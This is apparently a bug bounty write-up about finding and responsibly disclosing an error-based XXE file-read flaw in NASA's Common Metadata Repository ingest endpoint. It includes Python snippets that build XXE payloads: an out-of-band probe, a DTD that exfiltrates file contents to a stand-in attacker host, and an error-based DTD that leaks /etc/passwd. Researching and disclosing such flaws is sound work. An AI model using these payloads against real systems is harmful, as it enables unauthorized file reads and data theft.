
NASA's Vulnerability Disclosure Program (VDP) is one of the most heavily targeted programs by hackers worldwide, so finding something that isn't a duplicate or marked as Not Applicable requires creative recon and a different approach from most other researchers'.

NASA awards a letter of recognition to every researcher who finds and exploits a valid vulnerability. I wanted that letter, and I wanted it tied to something truly impactful. With 10.6k accepted vulnerabilities and more than 1k still open at the time, I knew it wouldn't be easy — most submissions end up marked as duplicates. No rewards for second place.

But hey, I had nothing to lose, so it was worth trying.

The Approach

I wanted to avoid duplicates, so my first filter was Bugcrowd. Bugcrowd has a nice feature that lets you see what's already been reported and the unique‑to‑duplicate ratio.


As Bugcrowd says:

Unique includes issues in Triaged, Unresolved, and Informational states while Total includes Duplicates of unique known issues

By looking at the known issues we can see, for example, that a reflected XSS had more than 340 duplicates with only 16 unique reports.


So hunting reflected XSS would largely be a waste of time. I took this as guidance on what to hunt: bug classes with a much lower chance of duplication. You get the idea.

The Hunt

Like many hunters, I started with recon — Subfinder, Amass and dorking. I spent a week, every day after work, mapping targets until I stumbled on a page that consistently took longer than usual to load.

That caught my interest, so I waited. Once it finally loaded, I jumped straight into the JavaScript files to look for clues as to why it was taking so long. I found a bunch of endpoints and began testing them.

The page was an interface to interact with the Common Metadata Repository.

The CMR is a high‑performance, authoritative metadata system within NASA's Earth Observing System Data and Information System. It stores standardized records describing datasets, granules, and related services, and exposes them via APIs so data can be registered, discovered, and accessed across NASA's Earthdata ecosystem. It's the backbone that makes NASA Earth observation data searchable and interoperable.
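To get a feel for the kind of metadata the CMR serves, its public search API can be queried directly. A minimal sketch — the `/search/collections.json` path is CMR's documented public search endpoint, but treat the exact parameter names here as assumptions to verify against the current docs:

```python
# Build a query against CMR's public collection-search API.
# The endpoint path is the documented public search interface; the
# parameter names (keyword, page_size) should be checked against the docs.
from urllib.parse import urlencode

CMR_SEARCH = "https://cmr.earthdata.nasa.gov/search/collections.json"

def build_search_url(keyword: str, page_size: int = 3) -> str:
    """Return a CMR collection-search URL for the given keyword."""
    return f"{CMR_SEARCH}?{urlencode({'keyword': keyword, 'page_size': page_size})}"
```

Fetching the resulting URL with any HTTP client returns JSON entries describing matching datasets — the "standardized records" mentioned above.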

Next step: GitHub.

The repository is actively maintained. I dove into the docs and started building requests. While some endpoints required authentication, most did not. Not long after, I discovered the Ingest Component,

responsible for collaborating with metadata db and indexer components of the CMR system to maintain the lifecycle of concepts coming into the system.

and the following endpoint:

/ingest/providers/*/validate/collection/*

Normally the endpoint requires an authentication token, but I discovered that it accepted and parsed XML from unauthenticated users before validating the token and rejecting the request.

Not only did it return clear parsing errors to unauthenticated users, but it also allowed external entities.
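The pre-auth parsing behaviour is easy to probe. A hedged sketch — the host, provider, and concept names below are placeholders, not the real targets — that sends deliberately malformed XML with no token and checks whether the response is a parser error rather than an auth error:

```python
# Probe whether XML is parsed before the auth check. All names below
# (host, provider, native id) are placeholders for illustration.
def build_probe(host: str = "cmr.example.gov",
                provider: str = "PROV1",
                native_id: str = "test-collection"):
    """Return (url, headers, body) for an unauthenticated probe request."""
    url = f"https://{host}/ingest/providers/{provider}/validate/collection/{native_id}"
    headers = {"Content-Type": "application/xml"}  # deliberately no auth token
    body = b"<Collection><ShortName>probe</ShortName>"  # unclosed root element
    return url, headers, body

# An XML parsing error in the response (instead of a 401/403) means the
# body reached the parser before the token was validated.
```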

This endpoint was used in SIT, UAT and Production environments.

I focused only on UAT and Production as SIT was returning 403 and I didn't want to waste time on bypasses.

The Exploitation

Everything led to an XXE hunt.

There are plenty of resources about XML External Entity Injection so I won't spend time explaining the vulnerability here. Others have already done so and far better than I could.

I went back to the Known Issues in Bugcrowd and there were no open reports for this particular class of injection. Either NASA assets are well secured, or no one had looked yet. I took the gamble and followed the lead.

I began the exploitation by confirming out-of-band (OOB) interaction. DNS resolution and HTTP requests were received, confirming that the external entity was being processed. However, without data exfiltration (or RCE in some cases), this type of behavior is typically classified as a P5 (Informational — no immediate impact).
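A minimal OOB probe looks like the following. The callback domain and document element are placeholders, and the real request body would need to match whatever schema the endpoint expects:

```python
# Classic XXE out-of-band probe: if the parser resolves external entities,
# it performs a DNS lookup (and usually an HTTP GET) against our domain.
def oob_probe(callback: str = "probe.attacker.example") -> str:
    """XML that forces the parser to fetch an external entity over HTTP."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [ <!ENTITY xxe SYSTEM "http://{callback}/hit"> ]>\n'
        '<r>&xxe;</r>'
    )
```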

I had to go deeper.

I tried a few out-of-band exfiltration techniques but couldn't retrieve any content (skill issue 😅), so I moved on to in-band reads.
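For reference, the typical OOB exfiltration attempt chains parameter entities inside an attacker-hosted DTD so the file content travels out embedded in a URL. This is the generic technique, not the exact payload used here, and it often fails exactly as described above (e.g. newlines or special characters in the file break the URL):

```python
# Attacker-hosted DTD for OOB exfiltration: %file reads the target file,
# %eval defines a second parameter entity whose URL embeds that content.
# &#x25; is an escaped '%' (parameter entities can't be nested literally
# inside an entity value).
def oob_exfil_dtd(path: str = "file:///etc/hostname",
                  collector: str = "attacker.example") -> str:
    return (
        f'<!ENTITY % file SYSTEM "{path}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{collector}/?d=%file;'\">\n"
        '%eval;\n'
        '%exfil;'
    )

def oob_exfil_body(dtd_url: str = "http://attacker.example/evil.dtd") -> str:
    """Request body that pulls in the hosted DTD via a parameter entity."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [ <!ENTITY % ext SYSTEM "{dtd_url}"> %ext; ]>\n'
        '<r/>'
    )
```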

I swapped the URL for file:///etc/passwd and then file:///etc/hostname — same story each time: no content, just CMR parsing errors.

But wait, parsing errors? Parsing Errors!

I remembered there is an XXE technique for exfiltrating file contents via error messages. If you can trigger the right parsing error, the system may end up echoing sensitive data directly in the error response.

I first crafted a valid request, then intentionally broke it to trigger a parsing error.

Forging a valid request was crucial: it allowed me to isolate the parsing logic from authentication and other issues. In a sense, I had more control over the error returned.

After some minutes of trial and error, guided by verbose logs, I managed to craft a valid request — from there the exploitation was straightforward.
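The error-based technique points a parameter entity at a path that cannot exist, with the target file's content embedded in that path, so the parser's "no such file" error leaks the content. A generic sketch — the actual request structure against CMR differed, and the hosts and paths here are placeholders:

```python
# Error-based XXE: the inner entity's SYSTEM URI embeds the file content
# inside a nonexistent path, so the resulting parser error echoes it back.
# &#x25; is an escaped '%' for nesting a parameter entity declaration.
def error_dtd(path: str = "file:///etc/passwd") -> str:
    """Attacker-hosted DTD that leaks `path` through a parsing error."""
    return (
        f'<!ENTITY % file SYSTEM "{path}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '
        "'file:///nonexistent/%file;'\">\n"
        '%eval;\n'
        '%error;'
    )
```

The DTD is hosted on an attacker server and referenced from the request's DOCTYPE via a parameter entity; when the parser expands %error;, the "file not found" message includes the expanded contents of the target file.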

The response came back containing the full content of /etc/passwd (or any other readable file).

/etc/passwd content

Error-based XXE achieved. Arbitrary file read. Severity: Critical (P1).

(Side note: file was not the only protocol enabled)

As per NASA VDP rules I stopped the testing and reported. I knew it was not going to be a duplicate — there were no open XXE reports, and it was unlikely someone had found the same issue on the exact same day.

Timeline

26th October — I reported the vulnerability

27th October — Bugcrowd Triaged as P1

31st October — Accepted by NASA Team

17th November — A pull request was opened to address the vulnerability

21st November — The fix was released

28th November — Received the Letter Of Appreciation

17th December — Report disclosed


After that, I took a one-week break to reset and learn a few new things.

Coming back with a fresher mind, I applied the same methodology and uncovered an SSRF vulnerability affecting internal services. It was triaged and accepted as a P3, leading to my second LOR.


And just a few days ago I managed to discover another P3 and even a P2, both of which are currently being addressed.


But these are for another story 😉

I was really happy to receive my letters as a testament that my efforts and methodology had paid off. Along the way, I learned a great deal. I explored technologies I had never heard of before, and figuring out how to break them was both rewarding and genuinely fun.


Lesson learned: lock in. Stop going after easy bugs and start putting in real work. Finding impactful vulnerabilities requires focus, patience, and deliberate thinking. That mindset always pays off.

Good luck on your next hunt!